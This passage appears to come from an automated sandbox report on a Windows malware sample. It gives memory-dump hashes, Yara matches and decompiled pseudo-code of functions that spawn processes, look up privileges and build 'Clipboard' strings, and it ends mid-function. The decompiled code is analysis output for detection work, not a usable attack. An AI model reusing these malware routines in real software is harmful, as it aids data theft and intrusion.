                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 99895d9b2ad2a124072d73d713d0a11e000198fa559e0c2902bb65c5f2070412
                                              • Instruction ID: 76e6af412832ddc9c47f435fe82822f2b102dba1cf339c8a45ccc41bd34e025b
                                              • Opcode Fuzzy Hash: 99895d9b2ad2a124072d73d713d0a11e000198fa559e0c2902bb65c5f2070412
                                              • Instruction Fuzzy Hash: 7C90027120108802D1107199C404B4A1006A7D0341F55C511E541876CDC6D589957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ab294cc1a2c130dff4ec6481955a1a38c54cb911116f26b6dc88a11151d2a6dc
                                              • Instruction ID: f5bc457093758cd2b710cb3200a2f35364105494050cd5aca1c1a4f0e57abf62
                                              • Opcode Fuzzy Hash: ab294cc1a2c130dff4ec6481955a1a38c54cb911116f26b6dc88a11151d2a6dc
                                              • Instruction Fuzzy Hash: FA90027120140402D10071998814B0B1006A7D0342F51C111E2158669DC665895575B1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8006055305b526b6d3f017ac431b7c54dba002709249949aa98e43e2fd9edbfe
                                              • Instruction ID: 6bce2194fa6e2b0e3e27dd795f6705c9994494c64ac1435ce2d3fccf47d46e6a
                                              • Opcode Fuzzy Hash: 8006055305b526b6d3f017ac431b7c54dba002709249949aa98e43e2fd9edbfe
                                              • Instruction Fuzzy Hash: 5890026160100042414071A9C844D065006BBE1351751C221E198C664DC599896966A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 78744762fdd38fb0644960d7e03e74a9ef9d6fb0889bfb90dad990a5e5e85af6
                                              • Instruction ID: adb6832af13e6c9adac2fa6f0e3c8216cccfdc0ac61acf69f79f8d4bcae8c5c1
                                              • Opcode Fuzzy Hash: 78744762fdd38fb0644960d7e03e74a9ef9d6fb0889bfb90dad990a5e5e85af6
                                              • Instruction Fuzzy Hash: A090026121180042D20075A98C14F071006A7D0343F51C215E1148668CC95589656561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d61bb9786c9e9364ad5bbcb5291fb8d6745f359148ceb9aff2ea7480b0e9fe3f
                                              • Instruction ID: 3e7bf87b6cc264a40fb792ac217a31f49bbece66d27eca1b832af23f2126938a
                                              • Opcode Fuzzy Hash: d61bb9786c9e9364ad5bbcb5291fb8d6745f359148ceb9aff2ea7480b0e9fe3f
                                              • Instruction Fuzzy Hash: 1990027120100802D18071998404A4A1006A7D1341F91C115E1019768DCA558B5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 90%
                                              			E004088C0(intOrPtr _a4) {
                                              				intOrPtr _v8;
                                              				char _v24;
                                              				char _v284;
                                              				char _v804;
                                              				char _v840;
                                              				void* _t24;
                                              				void* _t31;
                                              				void* _t33;
                                              				void* _t34;
                                              				void* _t40;
                                              				void* _t53;
                                              				intOrPtr _t56;
                                              				void* _t59;
                                              				void* _t61;
                                              				void* _t62;
                                              				void* _t63;
                                              
                                              				asm("in al, dx");
                                              				_t56 = _a4;
                                              				_t40 = 0; // executed
                                              				_t24 = E00406E10(_t56,  &_v24); // executed
                                              				_t61 = _t59 - 0x344 + 8;
                                              				if(_t24 != 0) {
                                              					E00407020( &_v24,  &_v840);
                                              					_t62 = _t61 + 8;
                                              					do {
                                              						E00419CE0( &_v284, 0x104);
                                              						E0041A350( &_v284,  &_v804);
                                              						_t63 = _t62 + 0x10;
                                              						_t53 = 0x4f;
                                              						while(1) {
                                              							_t31 = E00413DE0(E00413D80(_t56, _t53),  &_v284);
                                              							_t63 = _t63 + 0x10;
                                              							if(_t31 != 0) {
                                              								break;
                                              							}
                                              							_t53 = _t53 + 1;
                                              							if(_t53 <= 0x62) {
                                              								continue;
                                              							} else {
                                              							}
                                              							goto L9;
                                              						}
                                              						_t9 = _t56 + 0x14; // 0xffffe1a5
                                              						 *(_t56 + 0x474) =  *(_t56 + 0x474) ^  *_t9;
                                              						_t40 = 1;
                                              						L9:
                                              						_t33 = E00407050( &_v24,  &_v840);
                                              						_t62 = _t63 + 8;
                                              					} while (_t33 != 0 && _t40 == 0);
                                              					_t34 = E004070D0(_t56,  &_v24); // executed
                                              					if(_t40 == 0) {
                                              						asm("rdtsc");
                                              						asm("rdtsc");
                                              						_v8 = _t34 - 0 + _t34;
                                              						 *((intOrPtr*)(_t56 + 0x55c)) =  *((intOrPtr*)(_t56 + 0x55c)) + 0xffffffba;
                                              					}
                                              					 *((intOrPtr*)(_t56 + 0x31)) =  *((intOrPtr*)(_t56 + 0x31)) + _t40;
                                              					_t20 = _t56 + 0x31; // 0x5608758b
                                              					 *((intOrPtr*)(_t56 + 0x32)) =  *((intOrPtr*)(_t56 + 0x32)) +  *_t20 + 1;
                                              					return 1;
                                              				} else {
                                              					return _t24;
                                              				}
                                              			}


                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                              • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                              • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                              • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 87%
                                              			E00418512(void* __ebx, void* __ecx, intOrPtr _a4, char _a8, long _a12, long _a16, void* _a20, void* _a24, void* _a28, void* _a32, void* _a36, void* _a40) {
                                              				void* _v1;
                                              				void* __ebp;
                                              				void* _t25;
                                              				void* _t33;
                                              
                                              				asm("in eax, 0x3b");
                                              				if(__ebx + 1 <= 0) {
                                              					_t22 = _a4;
                                              					E00418DD0(_t33, _a4, _a4 + 0xc70,  *((intOrPtr*)(_t22 + 0x10)), 0, 0x34);
                                              					_t6 =  &_a8; // 0x413526
                                              					_t25 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                              					return _t25;
                                              				} else {
                                              					__ecx = __ecx + 1;
                                              					 *((intOrPtr*)(__ecx - 0x19d7d464)) = __ebx;
                                              					if (__ecx < 0) goto L6;
                                              				}
                                              			}

                                              APIs
                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: Process$AllocateCreateExitHeapInternal
                                              • String ID: &5A
                                              • API String ID: 2538108539-1617645808
                                              • Opcode ID: f3a22d0aade042e1be083db4b5b2a62910f892bccafab9e8ee1972729172f5b7
                                              • Instruction ID: 1ed546ac70a4fa69066f3ecb289bb14b8005791e05c66a09753c391c1b77cfbd
                                              • Opcode Fuzzy Hash: f3a22d0aade042e1be083db4b5b2a62910f892bccafab9e8ee1972729172f5b7
                                              • Instruction Fuzzy Hash: BA2138B1200208ABCB14DF99DC85EE777ADEF88754F11825DFA0D9B241C630E901CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E0041854F(void* __ebx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, char _a48, intOrPtr _a52) {
                                              				char _v5;
                                              				intOrPtr _v117;
                                              				signed char _t21;
                                              				void* _t26;
                                              				intOrPtr _t29;
                                              				intOrPtr _t35;
                                              				void* _t39;
                                              				void* _t40;
                                              				intOrPtr* _t41;
                                              				void* _t43;
                                              
                                              				_v117 = __edx;
                                              				_t19 = _a4;
                                              				_t4 = _t19 + 0xa14; // 0x58de852
                                              				_t5 = _t19 + 0xc80; // 0x408909
                                              				_t41 = _t5;
                                              				E00418DD0(_t39, _a4, _t41,  *_t4, 0, 0x37);
                                              				_t35 = _a52;
                                              				_t7 =  &_a48; // 0x407c45
                                              				_t21 =  *_t7;
                                              				_t29 = _a44;
                                              				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t21;
                                              				_t26 =  *((intOrPtr*)( *_t41))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t35, _t29,  &_v5, _t40, _t43); // executed
                                              				return _t26;
                                              			}

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID: E|@D
                                              • API String ID: 2186235152-1370303659
                                              • Opcode ID: bba775424ae61b69381b11a7fa84657fcec93d1ca160a33124552a8a05a7ae29
                                              • Instruction ID: f4e0e9482e5859832fe7bbcfafcc7bc9c9ece151ca07f14e514e7862d3903a08
                                              • Opcode Fuzzy Hash: bba775424ae61b69381b11a7fa84657fcec93d1ca160a33124552a8a05a7ae29
                                              • Instruction Fuzzy Hash: 71019DB2210108AFCB58CF99DC80EEB77A9AF8C354F158259BA0DA7251C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 37%
                                              			E00418550(void* __ebx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a44, char _a48, intOrPtr _a52) {
                                              				char _v5;
                                              				signed char _t19;
                                              				void* _t24;
                                              				intOrPtr _t27;
                                              				intOrPtr _t31;
                                              				void* _t35;
                                              				intOrPtr* _t36;
                                              
                                              				_t17 = _a4;
                                              				_t2 = _t17 + 0xa14; // 0x58de852
                                              				_t3 = _t17 + 0xc80; // 0x408909
                                              				_t36 = _t3;
                                              				E00418DD0(_t35, _a4, _t36,  *_t2, 0, 0x37);
                                              				_t31 = _a52;
                                              				_t5 =  &_a48; // 0x407c45
                                              				_t19 =  *_t5;
                                              				_t27 = _a44;
                                              				 *(__ebx - 0x74adeb3c) =  *(__ebx - 0x74adeb3c) ^ _t19;
                                              				_t24 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _t31, _t27,  &_v5); // executed
                                              				return _t24;
                                              			}

                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(00407C1D,00407C45,004079DD,00000010,?,00000044,?,?,?,00000044,E|@D,00000010,004079DD,00407C45,00407C1D,00407C89), ref: 004185A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID: E|@D
                                              • API String ID: 2186235152-1370303659
                                              • Opcode ID: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                              • Instruction ID: 94e036b50fa194e4b03716d33ce7f49ba96107573156df30ea47add9cf45f2e3
                                              • Opcode Fuzzy Hash: a8d03338a5b8e7428a3411fecad22ab56c063a2c8b97b146bea9412fcdabe5ed
                                              • Instruction Fuzzy Hash: 1E015FB2214208ABCB54DF89DC81EEB77ADAF8C754F158258BA0D97251D630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004184A0(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                              				void* _t10;
                                              				void* _t15;
                                              
                                              				E00418DD0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                              				_t6 =  &_a8; // 0x413526
                                              				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                              				return _t10;
                                              			}

                                              APIs
                                              • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID: &5A
                                              • API String ID: 1279760036-1617645808
                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                              • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 82%
                                              			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                              				char _v67;
                                              				char _v68;
                                              				void* _t12;
                                              				intOrPtr* _t13;
                                              				int _t14;
                                              				long _t21;
                                              				intOrPtr* _t25;
                                              				void* _t26;
                                              				void* _t30;
                                              
                                              				_t30 = __eflags;
                                              				_v68 = 0;
                                              				E00419D30( &_v67, 0, 0x3f);
                                              				E0041A910( &_v68, 3);
                                              				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                              				_t13 = E00413E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                              				_t25 = _t13;
                                              				if(_t25 != 0) {
                                              					_t21 = _a8;
                                              					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                              					_t32 = _t14;
                                              					if(_t14 == 0) {
                                              						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                              					}
                                              					return _t14;
                                              				}
                                              				return _t13;
                                              			}

                                              APIs
                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID:
                                              • API String ID: 1836367815-0
                                              • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                              • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                              • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                              • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                              				char _t10;
                                              				void* _t15;
                                              
                                              				_t3 = _a4 + 0xc74; // 0xc74
                                              				E00418DD0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                              				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}

                                              APIs
                                              • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                              • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E00418640(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                              				int _t10;
                                              				void* _t15;
                                              
                                              				E00418DD0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                              				return _t10;
                                              			}

                                              APIs
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: LookupPrivilegeValue
                                              • String ID:
                                              • API String ID: 3899507212-0
                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                              • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 68%
                                              			E004184D3(void* __eax, void* __ebx, void* __ecx, void* _a4, long _a8, int _a12) {
                                              				intOrPtr _v0;
                                              				char _t20;
                                              				void* _t30;
                                              
                                              				asm("in eax, dx");
                                              				if(__ebx + 1 >= 0) {
                                              					_t14 = _a8;
                                              					E00418DD0(_t30, _a8, _a8 + 0xc7c,  *((intOrPtr*)(_t14 + 0xa14)), 0, 0x36);
                                              					ExitProcess(_a12);
                                              				}
                                              				asm("out 0x1a, al");
                                              				_t17 = _v0;
                                              				_push(_t31);
                                              				_t4 = _t17 + 0xc74; // 0xc74
                                              				E00418DD0(_t30, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                              				_t20 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                              				return _t20;
                                              			}

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: c4e6f638c6bbfb625a412af3bc006a6bbc3782b9f9ef2934f87e239d32e6e085
                                              • Instruction ID: afa1998189b3a6a3451e3260206c35fed0aec0e5cce615273e8749b3ddd7f0ba
                                              • Opcode Fuzzy Hash: c4e6f638c6bbfb625a412af3bc006a6bbc3782b9f9ef2934f87e239d32e6e085
                                              • Instruction Fuzzy Hash: 59E08672210200BBD610DF54CC85FD337A8EF55350F05815DF65C9B242C534A640CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418548
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID: ExitProcess
                                              • String ID:
                                              • API String ID: 621844428-0
                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                              • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d8862a7ac2e586e0a32f9fa74f150ebf2468bfffac72ae5868077a25340aab74
                                              • Instruction ID: d1d0d51aee9570845ab81841e6251235ac245dc2966a6f7f91324c03916397fb
                                              • Opcode Fuzzy Hash: d8862a7ac2e586e0a32f9fa74f150ebf2468bfffac72ae5868077a25340aab74
                                              • Instruction Fuzzy Hash: 0DB09B71D014C5C5D611E7A44608F17790177D0755F17C151D2024755B4778C195F5B5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              C-Code - Quality: 54%
                                              			E00406AC2(void* __eax, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a13) {
                                              				short _v4;
                                              				intOrPtr _v8;
                                              				char _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				intOrPtr _v24;
                                              				char _v28;
                                              				short _v30;
                                              				char _v34;
                                              				char _v38;
                                              				short _v40;
                                              				intOrPtr _v44;
                                              				intOrPtr _v48;
                                              				intOrPtr _v52;
                                              				intOrPtr _v56;
                                              				char _v60;
                                              				void* __ebx;
                                              				void* __ebp;
                                              				void* _t52;
                                              				short _t60;
                                              				void* _t71;
                                              				void* _t74;
                                              				void* _t78;
                                              
                                              				_t71 = __esi;
                                              				asm("lahf");
                                              				if(__eflags == 0) {
                                              					L12:
                                              					asm("les ecx, [ebx+esi]");
                                              					_t78 = _t74;
                                              					_v4 = _t60;
                                              					_t57 = _t71 + 0x4464;
                                              					_v12 = 0xa000d;
                                              					_v8 = 0xa000d;
                                              					_v60 = 0x6c0043;
                                              					_v56 = 0x700069;
                                              					_v52 = 0x6f0062;
                                              					_v48 = 0x720061;
                                              					_v44 = 0x64;
                                              					_v40 = 0;
                                              					_v38 = 0;
                                              					_v34 = 0;
                                              					_v30 = 0;
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xcc0))))(_t71 + 0x4464, 0x104);
                                              					 *((intOrPtr*)( *((intOrPtr*)(_t71 + 0xcbc))))(0);
                                              					__eflags = 0 - 0x40;
                                              					if(0 <= 0x40) {
                                              						__eflags = 0;
                                              						if(0 == 0) {
                                              							_v28 = 0x6e0055;
                                              							_v24 = 0x6e006b;
                                              							_v20 = 0x77006f;
                                              							_v16 = 0x6e;
                                              							E00419CB0(_t57,  &_v28, 0x10);
                                              							_t78 = _t78 + 0xc;
                                              						}
                                              					} else {
                                              						 *((short*)(_t71 + 0x44e4)) = 0;
                                              					}
                                              					_t68 = _t71 + 0x4ce4;
                                              					E00419CB0(_t71 + 0x4ce4,  &_v60, 0x14);
                                              					E0041A110(_t71 + 0x4ce4, _t71, _t71 + 0x4ce4,  &_v12, 0);
                                              					E0041A110(_t68, _t71, _t68, _t57, 0);
                                              					E0041A110(_t68, _t71, _t68,  &_v12, 0);
                                              					E0041A110(_t68, _t71, _t68, _a12, 0);
                                              					 *((intOrPtr*)(_t71 + 0xa08)) = E00419FA0(_t68) + _t47;
                                              					__eflags = E00419FA0(_t68) + _t49;
                                              					E00419CB0( *((intOrPtr*)(_t71 + 0xa04)), _t68, E00419FA0(_t68) + _t49);
                                              					_t52 = E0040CE00(_t71, 0x13);
                                              					goto L17;
                                              				} else {
                                              					if(__eflags < 0) {
                                              						L11:
                                              						__eflags = __al;
                                              						__eax = E00419CB0(__ebx, __edx, __ebp);
                                              						goto L12;
                                              					} else {
                                              						if(__eflags == 0) {
                                              							asm("scasd");
                                              							return 1;
                                              						} else {
                                              							asm("fcomp3 st7");
                                              							asm("iretd");
                                              							__esp = __esp + 1;
                                              							 *((char*)(__esi - 0x741374ab)) = __al;
                                              							_push(__ebp);
                                              							__ebp = __esp;
                                              							__eax = _a13;
                                              							__esp = __esp - 0x3c;
                                              							__eax = E00419FA0(_a13);
                                              							__eflags = __eax - 0x1000;
                                              							if(__eax <= 0x1000) {
                                              								_push(__esi);
                                              								__esi = _a4;
                                              								__ecx =  *((intOrPtr*)(__esi + 0x7d8));
                                              								__eflags = __ecx;
                                              								if(__ecx != 0) {
                                              									_push(__ebx);
                                              									_push(__edi);
                                              									__edi = __eax + __eax;
                                              									__ebx = __ecx + 0x1ff560;
                                              									__ecx = _a8;
                                              									__eax = E00419FC0(_a8, __ebx, __edi);
                                              									 *__eax =  *__eax + __eax;
                                              									__esp = __esp + 0xc;
                                              									__eflags = __eax;
                                              									if(__eax == 0) {
                                              										__edx = _a8;
                                              										goto L11;
                                              									}
                                              									L17:
                                              								}
                                              							}
                                              							return _t52;
                                              						}
                                              					}
                                              				}
                                              			}
                                              0x00406ac2
                                              0x00406ac2
                                              0x00406ac4
                                              0x00406b2c
                                              0x00406b2c
                                              0x00406b2f
                                              0x00406b37
                                              0x00406b41
                                              0x00406b48
                                              0x00406b4f
                                              0x00406b56
                                              0x00406b5d
                                              0x00406b64
                                              0x00406b6b
                                              0x00406b72
                                              0x00406b79
                                              0x00406b7d
                                              0x00406b80
                                              0x00406b83
                                              0x00406b87
                                              0x00406b90
                                              0x00406b92
                                              0x00406b95
                                              0x00406ba2
                                              0x00406ba4
                                              0x00406bad
                                              0x00406bb4
                                              0x00406bbb
                                              0x00406bc2
                                              0x00406bc9
                                              0x00406bce
                                              0x00406bce
                                              0x00406b97
                                              0x00406b99
                                              0x00406b99
                                              0x00406bd7
                                              0x00406bde
                                              0x00406bea
                                              0x00406bf3
                                              0x00406bff
                                              0x00406c0b
                                              0x00406c1c
                                              0x00406c2d
                                              0x00406c32
                                              0x00406c3a
                                              0x00000000
                                              0x00406ac6
                                              0x00406ac6
                                              0x00406b21
                                              0x00406b22
                                              0x00406b26
                                              0x00000000
                                              0x00406ac8
                                              0x00406ac8
                                              0x00406aa8
                                              0x00406ab8
                                              0x00406aca
                                              0x00406aca
                                              0x00406acc
                                              0x00406acd
                                              0x00406ace
                                              0x00406ad0
                                              0x00406ad1
                                              0x00406ad3
                                              0x00406ad6
                                              0x00406ada
                                              0x00406ae2
                                              0x00406ae7
                                              0x00406aed
                                              0x00406aee
                                              0x00406af1
                                              0x00406af7
                                              0x00406af9
                                              0x00406aff
                                              0x00406b00
                                              0x00406b01
                                              0x00406b04
                                              0x00406b0a
                                              0x00406b10
                                              0x00406b13
                                              0x00406b15
                                              0x00406b18
                                              0x00406b1a
                                              0x00406b20
                                              0x00000000
                                              0x00406b20
                                              0x00406c42
                                              0x00406c43
                                              0x00406c44
                                              0x00406c48
                                              0x00406c48
                                              0x00406ac8
                                              0x00406ac6

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: C$a$b$d$i
                                              • API String ID: 0-2334916691
                                              • Opcode ID: 43218773b157b622986cc7113b039af5845d6eeae707c7a47e9bbce203d4c3c5
                                              • Instruction ID: e76c46f44748b4024c98f4b5004a6fdceb1eb105ab67c419daa92300f162c794
                                              • Opcode Fuzzy Hash: 43218773b157b622986cc7113b039af5845d6eeae707c7a47e9bbce203d4c3c5
                                              • Instruction Fuzzy Hash: 6831C7B1E00208BADB10EFA5EC82FFEB3B8AF85704F00451EF515A7242D779595587AD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 23%
                                              			E00406AA2(short __ecx, void* __eflags) {
                                              				signed char _t30;
                                              				void* _t51;
                                              				short _t55;
                                              				intOrPtr _t59;
                                              				void* _t66;
                                              				void* _t69;
                                              				void* _t76;
